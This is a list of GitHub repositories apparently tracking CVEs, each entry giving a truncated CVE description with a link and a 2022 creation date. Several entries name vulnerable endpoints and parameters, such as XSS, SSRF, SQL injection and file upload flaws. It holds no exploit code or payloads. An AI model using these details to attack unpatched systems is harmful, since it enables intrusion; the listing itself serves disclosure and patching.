**Cloud Mobility for Dell Storage versions 1.3.0 and earlier contains an Improper Access Control vulnerability within the Postgres database. A threat actor with root level access to either the vApp or containerized versions of Cloud Mobility may potentially exploit this vulnerability, leading to the modification or delet CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34434](https://github.com/Live-Hack-CVE/CVE-2022-34434) create time: 2022-12-29T04:16:37Z

**The package git before 1.11.0 are vulnerable to Command Injection via git argument injection. When calling the fetch(remote = 'origin', opts = {}) function, the remote parameter is passed to the git fetch subcommand in a way that additional flags can be set. The additional flags can be used to perform a command injecti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25648](https://github.com/Live-Hack-CVE/CVE-2022-25648) create time: 2022-12-29T04:15:58Z

**In Zimbra Collaboration Suite (ZCS) 8.8.15, at the URL /h/calendar, one can trigger XSS by adding JavaScript code to the view parameter and changing the value of the uncheck parameter to a string (instead of default value of 10). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41351](https://github.com/Live-Hack-CVE/CVE-2022-41351) create time: 2022-12-29T04:15:48Z

**In Zimbra Collaboration Suite (ZCS) 8.8.15, /h/search?action=voicemail&action=listen accepts a phone parameter that is vulnerable to Reflected XSS. This allows executing arbitrary JavaScript on the victim's machine. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41350](https://github.com/Live-Hack-CVE/CVE-2022-41350) create time: 2022-12-29T04:15:45Z

**Allocation of Resources Without Limits or Throttling in GitHub repository ikus060/rdiffweb prior to 2.5.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3456](https://github.com/Live-Hack-CVE/CVE-2022-3456) create time: 2022-12-29T04:15:41Z

**Origin Validation Error in GitHub repository ikus060/rdiffweb prior to 2.5.0a5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3457](https://github.com/Live-Hack-CVE/CVE-2022-3457) create time: 2022-12-29T04:15:14Z

**ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the rss_url_news parameter at /manager/index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41495](https://github.com/Live-Hack-CVE/CVE-2022-41495) create time: 2022-12-29T04:15:11Z

**XAPI open file limit DoS It is possible for an unauthenticated client on the network to cause XAPI to hit its file-descriptor limit. This causes XAPI to be unable to accept new requests for other (trusted) clients, and blocks XAPI from carrying out any tasks that require the opening of file descriptors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33749](https://github.com/Live-Hack-CVE/CVE-2022-33749) create time: 2022-12-29T04:15:07Z

**iCMS v7.0.16 was discovered to contain a Server-Side Request Forgery (SSRF) via the url parameter at admincp.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41496](https://github.com/Live-Hack-CVE/CVE-2022-41496) create time: 2022-12-29T04:15:04Z

**NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot ext4_read_file function, where insufficient validation of untrusted data may allow a highly privileged local attacker to cause a integer overflow, which may lead to code execution, escalation of privileges, limited denial of service, and some impa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28195](https://github.com/Live-Hack-CVE/CVE-2022-28195) create time: 2022-12-29T04:14:35Z

**NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot module tegrabl_cbo.c, where, if TFTP is enabled, a local attacker with elevated privileges can cause a memory buffer overflow, which may lead to code execution, loss of Integrity, limited denial of service, and some impact to confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28194](https://github.com/Live-Hack-CVE/CVE-2022-28194) create time: 2022-12-29T04:14:32Z

**In WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30293](https://github.com/Live-Hack-CVE/CVE-2022-30293) create time: 2022-12-29T04:14:25Z

**The generic P-256 feature in crypto/elliptic in Go before 1.17.9 and 1.18.x before 1.18.1 allows a panic via long scalar input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28327](https://github.com/Live-Hack-CVE/CVE-2022-28327) create time: 2022-12-29T04:14:22Z

**Command injection vulnerability in Manual Ping Form (Web UI) in Shenzhen Ejoin Information Technology Co., Ltd. ACOM508/ACOM516/ACOM532 609-915-041-100-020 allows a remote attacker to inject arbitrary code via the field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23332](https://github.com/Live-Hack-CVE/CVE-2022-23332) create time: 2022-12-29T04:14:18Z

**kernel/bpf/verifier.c in the Linux kernel through 5.15.14 allows local users to gain privileges because of the availability of pointer arithmetic via certain *_OR_NULL pointer types. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23222](https://github.com/Live-Hack-CVE/CVE-2022-23222) create time: 2022-12-29T04:13:24Z

**Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1886](https://github.com/Live-Hack-CVE/CVE-2022-1886) create time: 2022-12-29T04:13:04Z

**A flaw in Linux Kernel found in nfcmrvl_nci_unregister_dev() in drivers/nfc/nfcmrvl/main.c can lead to use after free both read or write when non synchronized between cleanup routine and firmware download routine. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1734](https://github.com/Live-Hack-CVE/CVE-2022-1734) create time: 2022-12-29T04:13:01Z

**lib/Horde/Mime/Viewer/Ooo.php in Horde Mime_Viewer before 2.2.4 allows XSS via an OpenOffice document, leading to account takeover in Horde Groupware Webmail Edition. This occurs after XSLT rendering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26874](https://github.com/Live-Hack-CVE/CVE-2022-26874) create time: 2022-12-29T04:12:57Z

**Buffer Overflow in uudecoder in Mutt affecting all versions starting from 0.94.13 before 2.2.3 allows read past end of input line CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1328](https://github.com/Live-Hack-CVE/CVE-2022-1328) create time: 2022-12-29T04:12:54Z

**A memory leak flaw was found in the Linux kernel’s DMA subsystem, in the way a user calls DMA_FROM_DEVICE. This flaw allows a local user to read random memory from the kernel space. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0854](https://github.com/Live-Hack-CVE/CVE-2022-0854) create time: 2022-12-29T04:12:51Z

**The SEMA API WordPress plugin before 4.02 does not properly sanitise and escape some parameters before using them in SQL statements via an AJAX action, leading to SQL Injections exploitable by unauthenticated users CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0836](https://github.com/Live-Hack-CVE/CVE-2022-0836) create time: 2022-12-29T04:12:47Z

**SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via png_load at /lib/png.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35080](https://github.com/Live-Hack-CVE/CVE-2022-35080) create time: 2022-12-29T04:12:40Z

**node SAML is a SAML 2.0 library based on the SAML implementation of passport-saml. A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauth CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39300](https://github.com/Live-Hack-CVE/CVE-2022-39300) create time: 2022-12-29T04:12:29Z

**Online Diagnostic Lab Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /php_action/createOrder.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41534](https://github.com/Live-Hack-CVE/CVE-2022-41534) create time: 2022-12-29T04:12:26Z

**Online Diagnostic Lab Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41533](https://github.com/Live-Hack-CVE/CVE-2022-41533) create time: 2022-12-29T04:12:22Z

**The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-10228](https://github.com/Live-Hack-CVE/CVE-2016-10228) create time: 2022-12-29T02:57:37Z

**Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, and Windows Server 2012 and R2 allow an attacker to detect specific files on the user's computer when affected Microsoft scripting engines do not properly handle objects in memory, aka "Microsoft Browser Informatio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-8529](https://github.com/Live-Hack-CVE/CVE-2017-8529) create time: 2022-12-29T02:53:47Z

**Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows low privileged attacker having Local Logon privilege with logon to the infrastructure where Core RDBMS executes to compromise Core RDBMS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2731](https://github.com/Live-Hack-CVE/CVE-2020-2731) create time: 2022-12-29T02:57:13Z

**Vulnerability in the Identity Manager product of Oracle Fusion Middleware (component: Advanced Console). Supported versions that are affected are 11.1.2.3.0 and 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Identity Manager. Successful attacks of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2729](https://github.com/Live-Hack-CVE/CVE-2020-2729) create time: 2022-12-29T02:57:09Z

**Vulnerability in the Identity Manager product of Oracle Fusion Middleware (component: OIM - LDAP user and role Synch). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Identity Manager. Successful attacks of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2728](https://github.com/Live-Hack-CVE/CVE-2020-2728) create time: 2022-12-29T02:57:06Z

**A missing permission check in Jenkins Health Advisor by CloudBees Plugin 3.0 and earlier allows attackers with Overall/Read permission to send a fixed email to an attacker-specific recipient. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2094](https://github.com/Live-Hack-CVE/CVE-2020-2094) create time: 2022-12-29T02:56:00Z

**A security feature bypass vulnerability exists in Windows Defender Application Control (WDAC) which could allow an attacker to bypass WDAC enforcement, aka 'Windows Defender Application Control Security Feature Bypass Vulnerability'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0951](https://github.com/Live-Hack-CVE/CVE-2020-0951) create time: 2022-12-29T02:53:50Z

**The proglottis Go wrapper before 0.1.1 for the GPGME library has a use-after-free, as demonstrated by use for container image pulls by Docker or CRI-O. This leads to a crash or potential code execution during GPG signature verification. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8945](https://github.com/Live-Hack-CVE/CVE-2020-8945) create time: 2022-12-29T02:51:07Z

**In tmux before version 3.1c the function input_csi_dispatch_sgr_colon() in file input.c contained a stack-based buffer-overflow that can be exploited by terminal output. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27347](https://github.com/Live-Hack-CVE/CVE-2020-27347) create time: 2022-12-29T02:46:47Z

**On Windows the Veyon Service before version 4.4.2 contains an unquoted service path vulnerability, allowing locally authenticated users with administrative privileges to run malicious executables with LocalSystem privileges. Since Veyon users (both students and teachers) usually don't have administrative privileges, th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15261](https://github.com/Live-Hack-CVE/CVE-2020-15261) create time: 2022-12-29T02:46:44Z

**Versions of Grocy <= 2.7.1 are vulnerable to Cross-Site Scripting via the Create Shopping List module, that is rendered upon deleting that Shopping List. The issue was also found in users, batteries, chores, equipment, locations, quantity units, shopping locations, tasks, taskcategories, product groups, recipes and pro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15253](https://github.com/Live-Hack-CVE/CVE-2020-15253) create time: 2022-12-29T02:46:30Z

**The affected product is vulnerable to misconfigured binaries, allowing users on the target PC with SYSTEM level privileges access to overwrite the binary and modify files to gain privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38483](https://github.com/Live-Hack-CVE/CVE-2021-38483) create time: 2022-12-29T02:57:41Z

**** DISPUTED ** The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocke CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43616](https://github.com/Live-Hack-CVE/CVE-2021-43616) create time: 2022-12-29T02:54:41Z

**An attacker can take leverage on PerFact OpenVPN-Client versions 1.4.1.0 and prior to send the config command from any application running on the local host machine to force the back-end server into initializing a new open-VPN instance with arbitrary open-VPN configuration. This could result in the attacker achieving e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27406](https://github.com/Live-Hack-CVE/CVE-2021-27406) create time: 2022-12-29T02:54:11Z

**The HW_KEYMASTER module has a vulnerability of missing bounds check on length.Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46839](https://github.com/Live-Hack-CVE/CVE-2021-46839) create time: 2022-12-29T02:53:57Z

**A flaw was found in c-ares library, where a missing input validation check of host names returned by DNS (Domain Name Servers) can lead to output of wrong hostnames which might potentially lead to Domain Hijacking. The highest threat from this vulnerability is to confidentiality and integrity as well as system availabi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3672](https://github.com/Live-Hack-CVE/CVE-2021-3672) create time: 2022-12-29T02:53:54Z

**Microsoft PowerShell Spoofing Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43896](https://github.com/Live-Hack-CVE/CVE-2021-43896) create time: 2022-12-29T02:53:43Z

**A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. A local user may be able to modify protected parts of the file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1815](https://github.com/Live-Hack-CVE/CVE-2021-1815) create time: 2022-12-29T02:51:03Z

**The HW_KEYMASTER module has an out-of-bounds access vulnerability in parameter set verification.Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46840](https://github.com/Live-Hack-CVE/CVE-2021-46840) create time: 2022-12-29T02:49:41Z

**A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3997](https://github.com/Live-Hack-CVE/CVE-2021-3997) create time: 2022-12-29T02:49:05Z

**Mikrotik RouterOs before stable 6.48.2 suffers from a memory corruption vulnerability in the tr069-client process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36614](https://github.com/Live-Hack-CVE/CVE-2021-36614) create time: 2022-12-29T02:46:40Z

**Mikrotik RouterOs before stable 6.48.2 suffers from a memory corruption vulnerability in the ptp process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36613](https://github.com/Live-Hack-CVE/CVE-2021-36613) create time: 2022-12-29T02:46:34Z

**Product: AndroidVersions: Android kernelAndroid ID: A-173788806References: Upstream kernel CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39713](https://github.com/Live-Hack-CVE/CVE-2021-39713) create time: 2022-12-29T02:46:27Z

**A vulnerability was found in SourceCodester Sanitization Management System and classified as critical. This issue affects some unknown processing of the file /php-sms/?p=services/view_service. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclose CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3504](https://github.com/Live-Hack-CVE/CVE-2022-3504) create time: 2022-12-29T02:57:34Z

**A vulnerability was found in SourceCodester Sanitization Management System. It has been classified as problematic. Affected is an unknown function of the file /php-sms/admin/. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclose CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3505](https://github.com/Live-Hack-CVE/CVE-2022-3505) create time: 2022-12-29T02:57:31Z

**OpenHarmony-v3.1.2 and prior versions, 3.0.6 and prior versions have an Out-of-bound memory read and write vulnerability in /dev/mmz_userdev device driver. The impact depends on the privileges of the attacker. The unprivileged process run on the device could read out-of-bound memory leading sensitive to information dis CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41686](https://github.com/Live-Hack-CVE/CVE-2022-41686) create time: 2022-12-29T02:57:27Z

**OpenHarmony-v3.1.2 and prior versions have an authenication bypass vulnerability in a callback handler function of Softbus_server in communication subsystem. Attackers can launch attacks on distributed networks by sending Bluetooth rfcomm packets to any remote device and executing arbitrary commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42463](https://github.com/Live-Hack-CVE/CVE-2022-42463) create time: 2022-12-29T02:57:24Z

**There is a file inclusion vulnerability in the template management module in UCMS 1.6 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42234](https://github.com/Live-Hack-CVE/CVE-2022-42234) create time: 2022-12-29T02:57:21Z

**OpenHarmony-v3.1.2 and prior versions have a Missing permission validation vulnerability in param service of startup subsystem. An malicious application installed on the device could elevate its privileges to the root user, disable security features, or cause DoS by disabling particular services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42488](https://github.com/Live-Hack-CVE/CVE-2022-42488) create time: 2022-12-29T02:57:17Z

**A missing permission check in Jenkins Continuous Integration with Toad Edge Plugin 2.3 and earlier allows attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28147](https://github.com/Live-Hack-CVE/CVE-2022-28147) create time: 2022-12-29T02:56:35Z

**A missing permission check in Jenkins Deployment Dashboard Plugin 1.0.10 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34796](https://github.com/Live-Hack-CVE/CVE-2022-34796) create time: 2022-12-29T02:56:31Z

**A missing permission check in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27205](https://github.com/Live-Hack-CVE/CVE-2022-27205) create time: 2022-12-29T02:56:28Z

**A missing permission check in Jenkins JiraTestResultReporter Plugin 165.v817928553942 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28137](https://github.com/Live-Hack-CVE/CVE-2022-28137) create time: 2022-12-29T02:56:25Z

**A missing permission check in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27215](https://github.com/Live-Hack-CVE/CVE-2022-27215) create time: 2022-12-29T02:56:21Z

**A missing permission check in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27199](https://github.com/Live-Hack-CVE/CVE-2022-27199) create time: 2022-12-29T02:56:18Z

**Missing permission checks in Jenkins SSH Agent Plugin 1.23 and earlier allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20620](https://github.com/Live-Hack-CVE/CVE-2022-20620) create time: 2022-12-29T02:56:15Z

**A missing permission check in Jenkins Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20618](https://github.com/Live-Hack-CVE/CVE-2022-20618) create time: 2022-12-29T02:56:11Z

**Jenkins Credentials Binding Plugin 1.27 and earlier does not perform a permission check in a method implementing form validation, allowing attackers with Overall/Read access to validate if a credential ID refers to a secret file credential and whether it's a zip file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20616](https://github.com/Live-Hack-CVE/CVE-2022-20616) create time: 2022-12-29T02:56:08Z

**A missing permission check in Jenkins Mailer Plugin 391.ve4a_38c1b_cf4b_ and earlier allows attackers with Overall/Read access to use the DNS used by the Jenkins instance to resolve an attacker-specified hostname. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20614](https://github.com/Live-Hack-CVE/CVE-2022-20614) create time: 2022-12-29T02:56:04Z

**Jenkins Parameterized Trigger Plugin 2.43 and earlier captures environment variables passed to builds triggered using Jenkins Parameterized Trigger Plugin, including password parameter values, in their `build.xml` files. These values are stored unencrypted and can be viewed by users with access to the Jenkins controlle CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27195](https://github.com/Live-Hack-CVE/CVE-2022-27195) create time: 2022-12-29T02:55:57Z

**Jenkins GitLab Authentication Plugin 1.13 and earlier stores the GitLab client secret unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27206](https://github.com/Live-Hack-CVE/CVE-2022-27206) create time: 2022-12-29T02:55:53Z

**Online Birth Certificate Management System version 1.0 suffers from an Insecure Direct Object Reference (IDOR) vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42067](https://github.com/Live-Hack-CVE/CVE-2022-42067) create time: 2022-12-29T02:55:50Z

**A flaw was found In 389-ds-base. When the Content Synchronization plugin is enabled, an authenticated user can reach a NULL pointer dereference using a specially crafted query. This flaw allows an authenticated attacker to cause a denial of service. This CVE is assigned against an incomplete fix of CVE-2021-3514. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2850](https://github.com/Live-Hack-CVE/CVE-2022-2850) create time: 2022-12-29T02:55:46Z

**In messaging service, there is a missing permission check. This could lead to local denial of service in messaging service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38687](https://github.com/Live-Hack-CVE/CVE-2022-38687) create time: 2022-12-29T02:55:42Z

**In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38688](https://github.com/Live-Hack-CVE/CVE-2022-38688) create time: 2022-12-29T02:55:39Z

**In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38689](https://github.com/Live-Hack-CVE/CVE-2022-38689) create time: 2022-12-29T02:55:36Z

**In camera driver, there is a possible memory corruption due to improper locking. This could lead to local denial of service in kernel. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38690](https://github.com/Live-Hack-CVE/CVE-2022-38690) create time: 2022-12-29T02:55:31Z

**In Gallery service, there is a missing permission check. This could lead to local denial of service in Gallery service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39103](https://github.com/Live-Hack-CVE/CVE-2022-39103) create time: 2022-12-29T02:55:28Z

**In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39105](https://github.com/Live-Hack-CVE/CVE-2022-39105) create time: 2022-12-29T02:55:24Z

**In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39115](https://github.com/Live-Hack-CVE/CVE-2022-39115) create time: 2022-12-29T02:55:21Z

**In messaging service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39117](https://github.com/Live-Hack-CVE/CVE-2022-39117) create time: 2022-12-29T02:55:18Z

**In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39113](https://github.com/Live-Hack-CVE/CVE-2022-39113) create time: 2022-12-29T02:55:14Z

**In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39114](https://github.com/Live-Hack-CVE/CVE-2022-39114) create time: 2022-12-29T02:55:11Z

**An input validation vulnerability exists in Openshift Enterprise due to a 1:1 mapping of tenants in Hawkular Metrics and projects/namespaces in OpenShift. If a user creates a project called "MyProject", and then later deletes it another user can then create a project called "MyProject" and access the metrics stored fro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7517](https://github.com/Live-Hack-CVE/CVE-2017-7517) create time: 2022-12-29T02:08:57Z

**A vulnerability was reported in various BIOS versions of older ThinkPad systems that could allow a user with administrative privileges or physical access the ability to update the Embedded Controller with unsigned firmware. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6171](https://github.com/Live-Hack-CVE/CVE-2019-6171) create time: 2022-12-29T02:10:27Z

**InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20933](https://github.com/Live-Hack-CVE/CVE-2019-20933) create time: 2022-12-29T02:09:18Z

**A flaw was found in the RHDM, where an authenticated attacker can change their assigned role in the response header. This flaw allows an attacker to gain admin privileges in the Business Central Console. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14841](https://github.com/Live-Hack-CVE/CVE-2019-14841) create time: 2022-12-29T02:09:15Z

**A flaw was found in the RHDM, where sensitive HTML form fields like Password has auto-complete enabled which may lead to leak of credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14840](https://github.com/Live-Hack-CVE/CVE-2019-14840) create time: 2022-12-29T02:09:08Z

**Improper input validation in the Auto-Discovery component of Nagios XI before 5.7.5 allows an authenticated attacker to execute remote code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28648](https://github.com/Live-Hack-CVE/CVE-2020-28648) create time: 2022-12-29T02:16:11Z

**MoinMoin is a wiki engine. In MoinMoin before version 1.9.11, an attacker with write permissions can upload an SVG file that contains malicious javascript. This javascript will be executed in a user's browser when the user is viewing that SVG file on the wiki. Users are strongly advised to upgrade to a patched version. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15275](https://github.com/Live-Hack-CVE/CVE-2020-15275) create time: 2022-12-29T02:16:04Z

**A command injection vulnerability in the sandcat plugin of Caldera 2.3.1 and earlier allows authenticated attackers to execute any command or service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19907](https://github.com/Live-Hack-CVE/CVE-2020-19907) create time: 2022-12-29T02:15:20Z

**An Out-Of-Bounds Read Vulnerability in Autodesk FBX SDK version 2020. and prior may lead to code execution or information disclosure through maliciously crafted FBX files. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41302](https://github.com/Live-Hack-CVE/CVE-2022-41302) create time: 2022-12-29T02:12:55Z

**A user may be tricked into opening a malicious FBX file which may exploit a use-after-free vulnerability in Autodesk FBX SDK 2020 version causing the application to reference a memory location controlled by an unauthorized third party, thereby running arbitrary code on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41303](https://github.com/Live-Hack-CVE/CVE-2022-41303) create time: 2022-12-29T02:12:52Z

**An Out-Of-Bounds Write Vulnerability in Autodesk FBX SDK 2020 version and prior may lead to code execution through maliciously crafted FBX files or information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41304](https://github.com/Live-Hack-CVE/CVE-2022-41304) create time: 2022-12-29T02:12:24Z

**Xvfb of SAP Business Objects Business Intelligence Platform, versions - 4.2, 4.3, platform on Unix does not perform any authentication checks for functionalities that require user identity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6294](https://github.com/Live-Hack-CVE/CVE-2020-6294) create time: 2022-12-29T02:10:33Z

**Improper initialization in subsystem for Intel(R) CSME versions before12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25, Intel(R) TXE versions before 4.0.30 Intel(R) SPS versions before E3_05.01.04.200 may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8744](https://github.com/Live-Hack-CVE/CVE-2020-8744) create time: 2022-12-29T02:10:30Z

**Highlight.js is a syntax highlighter written in JavaScript. Highlight.js versions before 9.18.2 and 10.1.2 are vulnerable to Prototype Pollution. A malicious HTML code block can be crafted that will result in prototype pollution of the base object's prototype during highlighting. If you allow users to insert custom HTM CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26237](https://github.com/Live-Hack-CVE/CVE-2020-26237) create time: 2022-12-29T02:10:17Z

